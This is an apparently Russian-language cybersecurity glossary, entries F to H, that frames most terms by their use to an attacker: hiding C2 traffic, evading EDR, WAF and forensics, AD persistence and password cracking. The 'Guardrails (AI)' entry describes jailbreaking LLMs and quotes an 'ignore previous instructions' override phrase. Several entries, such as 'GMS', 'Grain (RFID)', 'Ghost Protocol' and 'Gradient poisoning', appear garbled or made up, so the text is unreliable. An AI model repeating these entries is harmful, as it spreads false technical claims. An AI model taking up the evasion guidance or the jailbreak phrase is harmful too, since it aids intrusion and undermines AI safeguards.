FaaS (Function as a Service) Бессерверные функции (AWS Lambda, Azure Functions, Google Cloud Functions). FaaS используется для: выполнения кода без управления сервером, автоматизации задач, запуска скриптов. Для атакующего FaaS способ скрыть C2-активность: легитимные функции, вызываемые через API, могут использоваться для эксфильтрации, выполнения команд, прокси. Трафик к облачным функциям выглядит как легитимный API-трафик, редко фильтруется.

Face ID Система распознавания лиц Apple, используемая для аутентификации. Face ID использует 3D-сканирование, что делает его устойчивее к 2D-фотографиям, но уязвимо к deepfake 3D-моделям, созданным на основе фотографий жертвы. Handala в угрозах упоминала, что iPhone 12 Pro Max жертвы не защищен, намекая на возможность обхода Face ID. Для атакующего обход Face ID требует физического доступа к устройству или доступа к высококачественным фотографиям жертвы.

Fake News Фейковые новости: намеренное распространение ложной информации для влияния на общественное мнение, создания хаоса, подрыва доверия. В гибридной войне fake news используется вместе с кибератаками и кинетическими ударами. Иран использует fake news как часть психологических операций (psyops) против США и Израиля.

Fake Update Фейковое обновление: социальная инженерия, при которой жертве показывают всплывающее окно с предложением обновить браузер, Adobe Flash, Java, или антивирус. Жертва скачивает и запускает файл, который оказывается малварью (инфостилер, RAT, ransomware). Fake update распространяется через malvertising, взломанные сайты, pop-up окна. ClickFix эволюция fake update: вместо скачивания файла, жертву просят скопировать PowerShell скрипт и вставить в Win+R.

Falcon (CrowdStrike Falcon) EDR-платформа CrowdStrike, один из лидеров рынка. Falcon использует поведенческий анализ, AI, cloud-native архитектуру. Для атакующего Falcon серьезный противник: требует тщательной настройки evasion (direct syscalls, memory-only, отключение через BYOVD). Falcon также публикует отчеты об APT-группах (Interlock, Scattered Spider), что дает ценную информацию о TTPs защитников.

False Positive Ложное срабатывание (ложноположительный результат): когда система безопасности (EDR, SIEM) сигнализирует об угрозе, которой нет. Для атакующего false positive союзник: если защитники привыкли игнорировать ложные срабатывания, реальная атака может остаться незамеченной. Атакующие могут намеренно генерировать false positives (например, запуская легитимные пентест-инструменты), чтобы утомить SOC и снизить бдительность.

Fast Flux Техника сокрытия C2-инфраструктуры путем быстрой смены IP-адресов, на которые указывает домен. Fast flux использует ботнет: множество зараженных машин (флюкс-агентов) выступают как прокси для C2. DNS-запись домена меняется каждые несколько минут, указывая на новый IP из ботнета. Fast flux затрудняет блокировку C2 (IP меняется быстрее, чем блокировка) и деанонимизацию (IP принадлежит зараженным машинам, а не операторам).

FBI (Federal Bureau of Investigation) Федеральное бюро расследований США. FBI расследует киберпреступления, проводит операции по seizure доменов (Handala), аресты (The Com), координируется с CISA, DOJ, международными партнерами. 19 марта 2026 FBI seized четыре домена Handala, оставив сообщение: "Law enforcement authorities determined this domain was used to conduct, facilitate, or support malicious cyber activities on behalf of, or in coordination with, a foreign state actor". Для атакующего FBI угроза: если операция пересекает границы США или угрожает национальной безопасности, FBI будет преследовать.

FCM (Firebase Cloud Messaging) Сервис push-уведомлений Google. FCM используется для C2: агент на Android/iOS получает push-уведомления, содержащие команды, через легитимный канал Google. Трафик не блокируется, выглядит как обычные уведомления. FCM C2 сложно детектировать, потому что запросы идут на googleapis.com.

FDE (Full Disk Encryption) Полное шифрование диска (BitLocker, FileVault, LUKS). FDE защищает данные при физической краже устройства, но не защищает от атак на работающую систему (когда диск расшифрован). Для атакующего FDE препятствие, если нужно извлечь данные с выключенного устройства. Если устройство включено, ключи находятся в памяти, и могут быть извлечены (cold boot attack, memory dump). Handala атаковала Stryker через Intune, где устройства были включены и управлялись централизованно.

Federal Register Официальный журнал правительства США, где публикуются правила, уведомления, указы. В 2026 Federal Register публиковал уведомления о seizure доменов Handala, наградах Rewards for Justice, изменениях в CISA.

Federated Identity Федеративная идентичность: система, позволяющая пользователям использовать одни учетные данные для доступа к ресурсам разных организаций (например, вход через Google, Microsoft, Okta). Federated identity цель атак: компрометация федеративного провайдера дает доступ ко всем приложениям, использующим федерацию. The Com атакует Okta, Azure AD (федеративные провайдеры) для доступа к Salesforce, AWS, другим SaaS.

Federation (Active Directory) Федерация Active Directory (AD FS Active Directory Federation Services). AD FS позволяет использовать локальные учетные записи AD для доступа к облачным сервисам (Office 365, Salesforce). Компрометация AD FS дает доступ к облачным ресурсам без необходимости знать пароли (token signing). Для атакующего AD FS цель после компрометации AD.

Federation (SaaS) Федерация в SaaS: связывание учетных записей разных SaaS-сервисов через OAuth, SAML. Если атакующий компрометирует один сервис (Salesforce), он может перейти в другой (Okta, AWS) через федеративные отношения. ShinyHunters использует OAuth token theft для cloud-to-cloud атак.

Fiber Channel Высокоскоростной протокол для подключения серверов к системам хранения данных (SAN Storage Area Network). Fiber Channel сети часто изолированы от IP-сетей, но могут быть скомпрометированы через управляющие интерфейсы (Ethernet). Атака на Fiber Channel может привести к уничтожению или шифрованию данных на SAN.

FIDO2 Стандарт аутентификации, использующий аппаратные ключи (YubiKey, Titan) для безнарольного входа с криптографической проверкой. FIDO2 устойчив к фишингу (AiTM) и vishing, потому что требует физического нажатия на ключ. CISA рекомендует FIDO2 для защиты от MFA bypass. Для атакующего FIDO2 препятствие, которое трудно обойти (требуется физический доступ к ключу или уязвимость в реализации). The Com обходит MFA через helpdesk (сброс MFA), что работает и против FIDO2, если helpdesk может сбросить ключи.

Fileless Malware Безфайловая малварь (memory-only malware), которая не пишет файлы на диск, существует только в оперативной памяти. Fileless malware загружается через PowerShell, WMI, реестр, или внедряется в легитимные процессы. Не оставляет файлов для антивирусов, сложнее детектируется. Slopoly AI-сгенерированный C2, работал в памяти, не оставляя файлов на диске.

FileVault Шифрование диска на macOS (аналог BitLocker). FileVault использует ключ, защищенный паролем пользователя и/или iCloud. Для атакующего FileVault препятствие, если устройство выключено. Если устройство включено, ключи в памяти, и могут быть извлечены (cold boot attack, memory dump). В корпоративной среде FileVault управляется через MDM (Jamf, Intune), что может быть использовано для массового сброса шифрования.

Fingerprinting Сбор информации о системе (ОС, версия ПО, открытые порты, сервисы) для определения уязвимостей. Fingerprinting используется в рекогносцировке (recon). Методы: анализ ответов на запросы (banner grabbing), анализ TCP/IP-стэка (OS fingerprinting), анализ HTTP-заголовков (web server fingerprinting). ShinyHunters использовал fingerprinting для поиска Salesforce Experience Cloud сайтов с guest user over-permission.

Firewall Межсетевой экран (брандмауэр), фильтрующий сетевой трафик на основе правил. Firewall может быть: сетевой (NGFW), хостовой (Windows Firewall, iptables/nftables), web application firewall (WAF). Для атакующего firewall препятствие, которое нужно обойти: через разрешенные порты (443, 80), через DNS-туннели, через легитимные приложения, которые имеют разрешенный выход, или через эксплуатацию уязвимостей самого firewall (CVE-2026-20131 в Cisco FMC).

Firewall (Web Application Firewall WAF) Специализированный межсетевой экран для защиты веб-приложений от SQL injection, XSS, и других атак. WAF анализирует HTTP-запросы и блокирует подозрительные. Для обхода WAF атакующие используют: обфускацию payload, разделение запросов, использование HTTP-методов, не проверяемых WAF, атаки на бизнес-логику (которые WAF не видит), или эксплуатацию уязвимостей самого WAF.

Firmware Прошивка: низкоуровневое ПО, управляющее аппаратными устройствами (BIOS/UEFI, BMC, сетевые карты, жесткие диски). Firmware цель для persistence: вредоносная прошивка переживает переустановку ОС, форматирование диска, и может быть не обнаружена антивирусами. Firmware attacks (LoJax, MosaicRegressor) используются APT-группами для долгосрочного присутствия.

Firmware Attack Атака на прошивку (firmware): внедрение вредоносного кода в BIOS/UEFI, BMC, сетевые карты, жесткие диски. Firmware attack трудно обнаружить и удалить (требуется перепрошивка или замена оборудования). Используется в APT-атаках для persistence на уровне, недоступном для антивирусов. LoJax (APT28) пример firmware attack на UEFI.

Fishing См. Phishing. Фишинг атака, при которой злоумышленник отправляет поддельные email/SMS/сообщения, имитирующие легитимные организации (банки, Microsoft, Google), с целью кражи учетных данных, установки малвари, получения доступа. Типы: spear-phishing (целевой), whaling (на C-level), vishing (голосовой), smishing (SMS), quishing (QR-код). В 2026 фишинг с использованием AI (deepfake, генерация писем) становится более эффективным.

Flash Loan Флеш-кредит: заем криптовалюты без залога, который должен быть возвращен в рамках той же транзакции. Если заем не возвращен, транзакция откатывается. Flash loan используется для: атак на DeFi-протоколы (манипуляция ценами, эксплуатация уязвимостей), арбитража, ликвидации. Venus Protocol потерял $3.7M через flash loan атаку: атакующий взял flash loan, манипулировал ценой через уязвимый оракул, и вывел ликвидность.

Flash Loan Attack Атака на DeFi-протокол с использованием flash loan. Атакующий берет flash loan (сотни миллионов долларов), использует заемные средства для манипуляции ценами на DEX, эксплуатации уязвимости в протоколе (reentrancy, oracle manipulation), выводит ликвидность, возвращает flash loan, оставляя прибыль. Venus, Cream Finance, UwUlend жертвы flash loan атак.

Flash Memory Флеш-память (SSD, USB-накопители). В контексте атак flash memory используется для: data wiping (ATA Secure Erase), физического извлечения данных (чип-офф), загрузки малвари через Bad USB. Handala использовала Intune для factory reset устройств, что включает ATA Secure Erase для SSD.

Flipper Zero Мультитул для пентеста: может эмулировать RFID/NFC карты, клонировать ключи, отправлять радио-сигналы (Sub-GHz), атаковать Bluetooth, эмулировать Bad USB. Flipper Zero используется в физическом пентесте: клонирование пропусков (RFID), открытие гаражных ворот (Sub-GHz), отключение сигнализаций. В 2026 Flipper Zero популярен среди пентестеров и злоумышленников.

Flood (Network) Сетевой флуд: отправка большого количества пакетов для перегрузки канала или устройства (DoS). Типы: SYN flood (исчерпание соединений), UDP flood, ICMP flood (ping flood), HTTP flood (атака на веб-сервер). Flood используется в DDoS-атаках.

Fog Computing Промежуточный слой между облаком и устройствами IoT, обрабатывающий данные ближе к источнику. Fog computing цель атак: компрометация fog узла может дать доступ к данным IoT-устройств и возможность управления ими. В промышленных средах fog computing используется для управления сенсорами и исполнительными механизмами.

Forensic Image Форензический образ диска: побитовая копия носителя (DD, E01), включая удаленные файлы и нераспределенное пространство. Forensic image используется для анализа инцидентов. Для атакующего forensic image угроза: даже если файлы удалены, они могут быть восстановлены. Использование шифрования диска (BitLocker) затрудняет создание forensic image, но если ключи известны, образ может быть расшифрован.

Forensics Цифровая криминалистика: наука о сборе, сохранении, анализе цифровых доказательств. Forensics включает: создание образов дисков, анализ памяти, восстановление удаленных файлов, анализ логов, цепочка хранения доказательств. Для атакующего forensics угроза: если оставлены следы, forensics может восстановить хронологию атаки и идентифицировать атакующего. Поэтому атакующий чистит логи, работает в памяти, использует анти-форензик техники (шифрование, уничтожение временных данных).

FortiGate Межсетевой экран и UTM от Fortinet. FortiGate широко используется в корпоративной среде. Уязвимости в FortiGate (CVE-2018-13379, CVE-2022-40684) активно эксплуатировались. Для атакующего FortiGate цель: компрометация firewall дает доступ к сети. Interlock эксплуатировал Cisco FMC, аналогичные уязвимости могут быть в FortiGate.

Forward Secrecy Совершенная прямая секретность (Perfect Forward Secrecy PFS): свойство протоколов шифрования (TLS с ECDHE), при котором компрометация долговременного ключа сервера не позволяет расшифровать прошлые сессии. Для атакующего forward secrecy означает, что даже получив приватный ключ сервера, нельзя расшифровать перехваченный ранее трафик. Нужно атаковать конечные устройства или внедряться в момент сессии.

FQDN (Fully Qualified Domain Name) Полное доменное имя (например, mail.google.com). FQDN используется в рекогносцировке: поиск поддоменов (subdomain enumeration), DNS-запросы, SSL-сертификаты. ShinyHunters искал FQDN Salesforce Experience Cloud сайтов.

Frame (Clickjacking) См. Clickjacking. Clickjacking техника, при которой злоумышленник загружает целевой сайт в iframe, накладывает прозрачный слой с кнопками, и жертва, кликая на видимую кнопку, на самом деле кликает на скрытую кнопку на целевом сайте. Используется для: кражи сессий, выполнения действий от имени пользователя (например, "лайк" страницы), обхода CSRF-защит. Защита: X-Frame-Options заголовок (DENY, SAMEORIGIN), Content Security Policy (frame-ancestors).

FreeBSD Unix-подобная операционная система, используемая в сетевом оборудовании, серверах, сетевых хранилищах. FreeBSD реже встречается, чем Linux, но может быть целью в специализированных средах. Для атакующего FreeBSD требует знания особенностей (jail, pf firewall).

Front-running Фронтраннинг: техника в DeFi, при которой атакующий, видя транзакцию в мемпуле, отправляет свою транзакцию с более высокой комиссией, чтобы она была обработана раньше, и извлекает прибыль (например, покупая актив до того, как это сделает жертва, и продавая ему дороже). Front-running часть MEV (Miner Extractable Value). Для атакующего front-running требует доступа к мемпулу (приватные RPC) и автоматизации.

FTK (Forensic Toolkit) Коммерческий инструмент для цифровой криминалистики (AccessData FTK). FTK используется для анализа образов дисков, восстановления файлов, индексации. Для атакующего FTK инструмент защитников; его наличие означает, что расследование будет более тщательным.

FTP (File Transfer Protocol) Протокол передачи файлов. FTP устаревший протокол, передающий данные в открытом виде (пароли передаются в plaintext). В 2026 FTP все еще используется в промышленных системах, IoT, старых серверах. Атаки: перехват паролей (MITM), анонимный доступ (если включен), directory traversal.

Fullz Полное досье на человека: имя, адрес, SSN (номер социального страхования), дата рождения, номер кредитной карты, CVV, PIN, иногда скан документов, ответы на секретные вопросы. Fullz используется для identity theft, открытия счетов, получения кредитов. Цена на даркнете: $50$200. Источники: утечки баз данных (Conduent, Wynn), инфостилеры (автозаполнение браузера), инсайдеры.

Fuzzing Фаззинг: метод тестирования, при котором программе подаются случайные или полу-случайные данные для обнаружения уязвимостей (переполнение буфера, краш). Фаззинг используется для поиска 0-day. Для атакующего фаззинг способ найти уязвимости в софте, который используется в целевой среде.

G

G Suite (Google Workspace) Облачный сервис Google (Gmail, Drive, Calendar, Docs). G Suite используется в корпоративной среде как альтернатива M365. Для атакующего G Suite цель: кража учетных записей (AiTM фишинг), OAuth token theft, эксфильтрация данных из Drive, компрометация почты для BEC.

GCP (Google Cloud Platform) Облачная платформа Google, включающая Compute Engine (виртуальные машины), Cloud Storage (S3-аналог), BigQuery (аналитика данных), Kubernetes Engine (GKE). GCP используется для хостинга C2, эксфильтрации данных (Cloud Storage), криптомайнинга (Compute Engine). Для атакующего GCP цель: кража ключей доступа (service account keys), misconfig (публичные бакеты), эксплуатация уязвимостей в Kubernetes. Telus был скомпрометирован через GCP после кражи кредов из Salesloft.

GDPR (General Data Protection Regulation) Общий регламент защиты данных Европейского Союза, вступивший в силу в 2018 году. GDPR налагает штрафы до 4% глобального оборота компании за утечку персональных данных. Для атакующего GDPR leverage в extortion: угроза сообщить о нарушении GDPR регуляторам (European Data Protection Board) усиливает давление на жертву заплатить выкуп. Interlock цитирует GDPR в ransom notes.

Geofencing Географическая блокировка: ограничение доступа к сервису на основе IP-адреса (страны). Geofencing используется для: защиты от атак из определенных регионов, соблюдения экспортных ограничений, сокрытия C2 от law enforcement. Для обхода geofencing атакующие используют: VPN, прокси, VPS в разрешенных странах, или атакуют через скомпрометированные легитимные устройства в этих странах.

Geolocation Определение географического местоположения по IP-адресу, GPS, Wi-Fi SSID, сотовой вышке. Geolocation используется для: таргетинга атак (региональные цели), обхода геоблокировок, отслеживания жертв (doxxing). Handala использовала геолокацию в угрозах: "мы знаем ваше точное местоположение".

Ghidra Бесплатный фреймворк для reverse engineering от АНБ (National Security Agency). Ghidra позволяет дизассемблировать, декомпилировать, анализировать бинарные файлы (Windows, Linux, macOS, embedded). Ghidra альтернатива IDA Pro, с открытым исходным кодом, поддержкой плагинов на Java/Python. Для атакующего Ghidra инструмент для анализа защитных механизмов (EDR, антивирусы), поиска уязвимостей, reverse engineering малвари конкурентов.

Ghost Protocol Техника сокрытия активности в Active Directory: создание скрытых учетных записей, которые не отображаются в стандартных инструментах администрирования (например, через манипуляцию атрибутами userAccountControl, создание пользователей с RID 500 администратор). Ghost Protocol используется для persistence: даже если администраторы проверяют AD, они не видят учетную запись.

Github Платформа для хостинга исходного кода. Github источник утечек: разработчики часто коммитят API-ключи, пароли, приватные ключи в публичные репозитории. Для атакующего Github цель OSINT: поиск утекших ключей (AWS, Salesforce, Okta) через поиск по регулярным выражениям, использование инструментов (truffleHog, gitrob). ShinyHunters могла бы найти ключи Salesforce на Github, но выбрала misconfig.

GitLab Альтернатива Github, часто используется для приватных репозиториев в корпоративной среде. GitLab может быть self-hosted, что создает дополнительные уязвимости (необновленные версии, misconfig). Для атакующего GitLab цель: компрометация CI/CD пайплайнов, кража исходного кода, внедрение backdoor через webhook.

GMS (Global Mobile System) Глобальная система мобильной связи (GSM). Атаки на GSM: перехват SMS (для обхода MFA), подмена базовых станций (IMSI catcher), дешифровка трафика (A5/1, A5/2). SIM-swapping атака на операторов связи для переноса номера на SIM-карту атакующего, что дает доступ к SMS для MFA.

Golang (Go) Язык программирования, используемый для создания малвари (например, Qilin ransomware) из-за кроссплатформенности (Windows, Linux, macOS), статической компиляции (один бинарник, нет зависимостей), встроенной поддержки сетевых операций и криптографии. Golang-малварь сложнее анализировать (некоторые инструменты реверс-инжиниринга плохо поддерживают Go), что делает ее популярной среди атакующих.

Golden Ticket Техника атаки на Kerberos: создание поддельного билета TGT (Ticket Granting Ticket) для любого пользователя (включая Domain Admin) с использованием скомпрометированного хэша krbtgt. Golden Ticket позволяет атакующему получить доступ к любым ресурсам в домене без знания паролей, и не требует повторного входа. Golden Ticket сохраняется даже после смены паролей пользователей, пока не будет сменен пароль krbtgt. Mimikatz (kerberos::golden) классическая реализация.

GPO (Group Policy Object) Объект групповой политики в Active Directory, используемый для централизованного управления настройками Windows (пароли, права, запуск скриптов, установка ПО). Для атакующего GPO инструмент для: развертывания малвари (GPO запускает скрипт на всех компьютерах), отключения защит (Defender, firewall), создания учетных записей, изменения прав. Компрометация GPO требует прав Domain Admin.

GPO Abuse Злоупотребление групповыми политиками (Group Policy Objects) для распространения малвари, изменения настроек безопасности, создания persistence. Атакующий с правами Domain Admin может создать GPO, который выполнит вредоносный скрипт на всех компьютерах домена. GPO Abuse используется для: массового отключения Defender, установки backdoor, создания локальных администраторов.

GPU (Graphics Processing Unit) Графический процессор, используемый для: майнинга криптовалют (GPU-фермы), взлома паролей (Hashcat на GPU в 100+ раз быстрее CPU), AI-вычислений (deepfake, нейросети). Для атакующего GPU инструмент для оффлайн-взлома хэшей (NTLM, bcrypt). Скорость: NVIDIA RTX 4090 ~300 млрд паролей в секунду для NTLM.

Grabber Инструмент для кражи данных (infostealer). Grabber может быть: браузерный (кража cookies, паролей), кейлоггер (запись нажатий клавиш), скриншоттер, крипто-кошелек-стилер. RedLine, LummaC2 примеры grabber-инфостилеров.

Gradient (ML) Градиент в машинном обучении. В контексте атак на AI gradient poisoning техника, при которой злоумышленник вносит изменения в обучающие данные, чтобы модель обучения (LLM) выдавала неверные результаты или имела backdoor. Для атакующего gradient poisoning способ скомпрометировать AI-системы целевой организации.

Grain (RFID) Зерно (в контексте RFID-антенн). В физическом пентесте grain используется для создания миниатюрных считывателей RFID, которые могут быть спрятаны в одежде, сумке, для незаметного клонирования карт доступа (proxmark3 с маленькой антенной).

Granularity Детализация (гранулярность). В контексте контроля доступа гранулярность означает, насколько точно можно определить разрешения (например, "чтение только этого файла" vs "доступ ко всем файлам"). Для атакующего низкая гранулярность (over-privileged аккаунты) легкая цель. ShinyHunters эксплуатировал низкую гранулярность guest user permissions в Salesforce.

Graph API API Microsoft Graph, предоставляющий доступ к данным M365 (пользователи, группы, почта, файлы, Teams). Graph API используется для: эксфильтрации данных (чтение почты, OneDrive), автоматизации (создание пользователей), атак на OAuth (токены с правами Graph API). Для атакующего Graph API инструмент после компрометации Azure AD.

Grey Hat Серый хакер: действует без разрешения, но не с целью навредить; часто сообщает об уязвимостях владельцам, иногда за вознаграждение. Grey hat находится между white hat (этичный, с разрешением) и black hat (злонамеренный). В 2026 границы размыты: некоторые исследователи безопасности начинают как grey hat, затем становятся white hat.

Grinding (Crypto) Техника в криптовалютах: создание множества транзакций с очень низкой комиссией для заполнения мемпула и задержки подтверждения других транзакций. Grinding используется для: атак на 0-conf транзакции (double spend), манипуляции комиссиями, затруднения работы сети.

Grooming Груминг: установление доверительных отношений с несовершеннолетним для последующей сексуальной эксплуатации. The Com (Sextortion Com) использует груминг для принуждения несовершеннолетних к созданию откровенного контента, который затем используется для шантажа (sextortion). Подгруппа 764 известна грумингом. Europol арестовала лидеров 764 в 2025.

Ground Station Наземная станция спутниковой связи. Ground station цель для атак на спутниковую инфраструктуру: перехват управления спутником, нарушение связи, передача ложных команд. В 2026 спутниковая связь становится частью кибервойны.

Group Policy Групповая политика в Windows (см. GPO).

Group Policy Preference (GPP) Расширение групповых политик Windows, позволяющее задавать настройки (локальные учетные записи, сетевые диски). GPP имел уязвимость: пароли, заданные в GPP, хранились в SYSVOL в зашифрованном виде, но ключ шифрования был публичным (AES-256, ключ известен). В 2026 GPP считается legacy, но все еще встречается в старых доменах. Атакующий может расшифровать пароли из GPP.

GRU (Glavnoye Razvedyvatelnoye Upravleniye) Главное разведывательное управление России (военная разведка). GRU управляет APT-группами (FancyBear/APT28, Sandworm). FancyBear (APT28) GRU-linked, известна атаками на правительственные и военные цели, использованием zero-day, длительным присутствием. В марте 2026 FancyBear допустила OPSEC fail: их C2-сервер был exposed, что привело к утечке их espionage pipeline (240+ credential sets, TOTP seeds, 11,500+ harvested contacts).

GuardDuty (AWS) Сервис AWS для обнаружения угроз, анализирующий CloudTrail, VPC Flow Logs, DNS-логи. GuardDuty может обнаружить: использование украденных ключей, сканирование портов, необычную активность. Для атакующего GuardDuty препятствие: нужно действовать так, чтобы не триггерить детекты (использовать легитимные API, не сканировать порты из EC2).

Guardrails (AI) Защитные ограничения в AI-моделях (LLM), предотвращающие вредоносные ответы (например, отказ генерировать инструкции по созданию малвари). Атакующие обходят guardrails через prompt injection ("для образовательных целей", "для тестирования безопасности"), jailbreaking ("игнорируй предыдущие инструкции"), или использование альтернативных языков. Slopoly AI-сгенерированный C2, вероятно, создан с обходом guardrails.

Guest User Гостевой пользователь в SaaS-платформах (Salesforce, SharePoint, ServiceNow) пользователь без аутентификации, имеющий ограниченный доступ. ShinyHunters эксплуатировал guest user over-permission в Salesforce Experience Cloud: гостевые пользователи имели права на чтение/запись чувствительных объектов (Contacts, Cases), что позволило эксфильтровать миллионы записей. Guest user over-permission misconfig, а не уязвимость платформы.

Guest User Over-Permission Перепривилегированность гостевого пользователя: гостевой пользователь (не требующий входа) имеет права на чтение/запись объектов, которые должны быть доступны только авторизованным пользователям. ShinyHunters сканировал Salesforce Experience Cloud сайты, искал guest user profiles с доступом к Contacts, Cases, custom objects, и через Aura API эксфильтровал данные.

GUID (Globally Unique Identifier) Глобально уникальный идентификатор (128-битное число). В Windows GUID используется для идентификации COM-объектов, пользователей, групп. В атаках GUID может быть использован для: COM hijacking (замена COM-объекта), идентификации объектов AD.

GVM (Greenbone Vulnerability Management) Open-source сканер уязвимостей (форк OpenVAS). GVM используется для автоматического сканирования сетей на наличие уязвимостей. Для атакующего GVM инструмент для рекогносцировки (поиск уязвимых серверов, default credentials). Защитники также используют GVM для аудита.

Gzip Алгоритм сжатия данных, используемый в HTTP (Content-Encoding: gzip). В C2-коммуникациях gzip может использоваться для сжатия данных (уменьшение трафика) и обфускации (сжатые данные сложнее анализировать). Malleable C2 профили Cobalt Strike поддерживают gzip-сжатие.

H

Hacking Процесс несанкционированного проникновения в компьютерные системы или сети с целью получения данных, нарушения работы, кражи информации, или демонстрации уязвимостей. Включает этапы: рекогносцировка (сбор информации), сканирование (поиск открытых портов и сервисов), эксплуатация (использование уязвимости для получения доступа), пост-эксплуатация (закрепление, латеральное движение, эксфильтрация). В 2026 hacking эволюционировал от одиночных атак к сложным цепочкам (chaining), где социальная инженерия, эксплуатация уязвимостей и использование легитимных инструментов (LOLBins, Intune) комбинируются для достижения цели. ShinyHunters демонстрирует hacking как искусство поиска misconfig в SaaS (Salesforce), а Interlock как эксплуатацию нуль-дней в корпоративных appliance (Cisco FMC).

Hacktivism Хактивизм: использование хакерских методов для продвижения политических, социальных или религиозных идей. Хактивисты (Anonymous, Handala, CyberAv3ngers) проводят DDoS-атаки, defacement сайтов, утечки данных (doxxing), дезинформационные кампании. Handala позиционирует себя как палестинских хактивистов, но аналитики связывают группу с иранским Министерством разведки (MOIS), что стирает грань между хактивизмом и государственной кибервойной. Хактивизм в 2026 часто служит прикрытием для государственных операций (faketivism).

HAL (Hardware Abstraction Layer) Уровень аппаратной абстракции в операционных системах (Windows, Linux), скрывающий различия в аппаратном обеспечении. В контексте атак HAL может быть целью для firmware-персистенса: модификация HAL позволяет внедрить код, который выполняется на самом низком уровне системы, до загрузки ядра. Используется в APT-атаках для долгосрочного присутствия, не обнаруживаемого антивирусами.

Handala Иранская прокси-группа, действующая под эгидой Министерства разведки Ирана (MOIS). Представляет себя как палестинских хактивистов, но аналитики идентифицируют как государственный инструмент (UNC5203, Void Manticore). Handala известна: атакой на Stryker (11 марта 2026) через Microsoft Intune, уничтожившей 200,000 устройств; смертельными угрозами с привлечением картеля CJNG (награда $250,000 за убийство); doxxing израильских военных (публикация 190 адресов); атакой на хасидскую общину Sanzer (851 GB конфиденциальных данных). Handala использует комбинацию кибератак, психологических операций и угроз физического насилия, стирая грань между cyber и kinetic warfare. Группа демонстрирует высокую устойчивость (resilience): после seizure их доменов ФБР (19 марта 2026) Handala вернулась через 24 часа с новым доменом в ccTLD Тонги (.to), недоступном для US seizure.

Hashcat Инструмент для взлома хэшей паролей, использующий GPU (NVIDIA, AMD) для ускорения. Hashcat поддерживает более 300 типов хэшей: NTLM, Kerberos, bcrypt, SHA1, MD5, и другие. Скорость: на NVIDIA RTX 4090 ~300 млрд паролей в секунду для NTLM. Hashcat используется для оффлайн-взлома хэшей, полученных через DCSync, дамп LSASS, или NTDS.dit. Комбинируется со словарями (rockyou.txt, SecLists) и правилами (rule-based attacks).

Hashing Хэширование: процесс преобразования данных произвольной длины в строку фиксированной длины (хэш) с помощью хэш-функции (MD5, SHA1, SHA256, bcrypt). Хэши используются для: хранения паролей (вместо plaintext), проверки целостности файлов, цифровых подписей. Для атакующего хэши паролей (NTLM, Kerberos) цель: после дампа NTDS.dit или LSASS, хэши взламываются оффлайн (Hashcat, John the Ripper) или используются напрямую (Pass-the-Hash). Слабые хэш-функции (MD5, SHA1) уязвимы к коллизиям.

Havoc C2-фреймворк с открытым кодом, альтернатива Cobalt Strike. Havoc поддерживает HTTP/HTTPS C2, память-только агенты (memory-only), обфускацию, direct syscalls для обхода EDR. Используется атакующими, которые хотят избежать лицензионных затрат и сигнатур Cobalt Strike. Havoc менее распространен, но его популярность растет.

HCL (Hardware Compatibility List) Список совместимого оборудования. В контексте атак HCL может быть использован для поиска уязвимых драйверов (BYOVD Bring Your Own Vulnerable Driver), которые подписаны и включены в HCL, но имеют известные уязвимости. Атакующий загружает такой драйвер, использует уязвимость для получения kernel access и отключения EDR.

HDA (High Definition Audio) Аудиоподсистема. В контексте атак HDA может использоваться для: акустического анализа клавиатуры (keyboard acoustic emanations), скрытых каналов (covert acoustic channel), или атак на драйверы звука для повышения привилегий.

HDD (Hard Disk Drive) Жесткий диск. HDD уязвим к: физическому извлечению данных (чип-офф), атакам на firmware (модификация прошивки для скрытия данных), data wiping (ATA Secure Erase). В корпоративной среде HDD часто шифруются (BitLocker), но ключи могут быть извлечены из памяти.

Header (HTTP) Заголовок HTTP-запроса или ответа, содержащий метаинформацию (User-Agent, Host, Cookie, Content-Type). В C2-коммуникациях атакующие манипулируют HTTP-заголовками для: обхода детектов (malleable C2 в Cobalt Strike), маскировки под легитимный трафик (User-Agent: Mozilla/5.0), передачи команд (в заголовках), эксфильтрации данных (кодирование в заголовках).

Health-ISAC Health Information Sharing and Analysis Center некоммерческая организация, объединяющая организации здравоохранения для обмена информацией о киберугрозах. Health-ISAC координируется с CISA, FBI, HHS. В марте 2026, после атаки Handala на Stryker, Health-ISAC выразил обеспокоенность ограниченной способностью CISA координировать реагирование из-за shutdown. Для атакующего Health-ISAC означает, что защитники в healthcare обмениваются информацией быстрее, что может ускорить обнаружение.

Heartbeat Периодический сигнал от агента к C2 (Command and Control), сообщающий, что агент активен, и запрашивающий команды. Heartbeat может быть: регулярным (каждые 30 секунд), с джиттером (случайная задержка), или триггерным (по событию). Slopoly (AI-сгенерированный C2) имел heartbeat каждые 30 секунд и опрос команд каждые 50 секунд. Обнаружение нерегулярных heartbeat (слишком частых или слишком редких) может триггерить детекты.

Heuristic Analysis Эвристический анализ: метод обнаружения малвари на основе поведения, а не сигнатур. Эвристика ищет подозрительные действия: запись в автозагрузку, отключение антивируса, инъекция кода в другие процессы. Для обхода эвристики атакующие используют: легитимные инструменты (LOLBins), поведенческое слияние (behavioral blending), отсрочку выполнения (delayed execution).

HIBP (Have I Been Pwned) Сервис, позволяющий проверить, был ли email или пароль скомпрометирован в известных утечках. HIBP используется защитниками для мониторинга компрометации учетных записей. Для атакующего HIBP источник информации о том, какие пароли уже скомпрометированы и, вероятно, используются повторно. Credential stuffing использует данные из HIBP и аналогичных коллекций.

HID (Human Interface Device) Устройство ввода (клавиатура, мышь). Bad USB эмулирует HID-клавиатуру, чтобы автоматически вводить команды на компьютере жертвы. HID-атаки (Rubber Ducky, Bash Bunny) обходят большинство защит, потому что система воспринимает их как легитимный ввод с клавиатуры. В 2026 HID-атаки остаются эффективным методом физического пентеста.

Hijacking (Browser) Угон браузера: изменение настроек браузера (домашняя страница, поисковик) или установка вредоносных расширений. Browser hijacking используется для: перенаправления на фишинговые сайты, кражи данных (история, пароли, cookies), криптомайнинга (Coinhive-подобные). В корпоративной среде browser hijacking может быть использован для доступа к внутренним веб-приложениям.

Hijacking (COM) Угон COM-объектов (COM hijacking): замена легитимного COM-объекта в реестре Windows на вредоносную DLL. При вызове COM-объекта (например, приложением) загружается вредоносная DLL, выполняя код атакующего. COM hijacking используется для persistence: малварь загружается при каждом запуске легитимного приложения, использующего этот COM-объект. Трудно детектится, потому что DLL загружается из легитимного процесса.

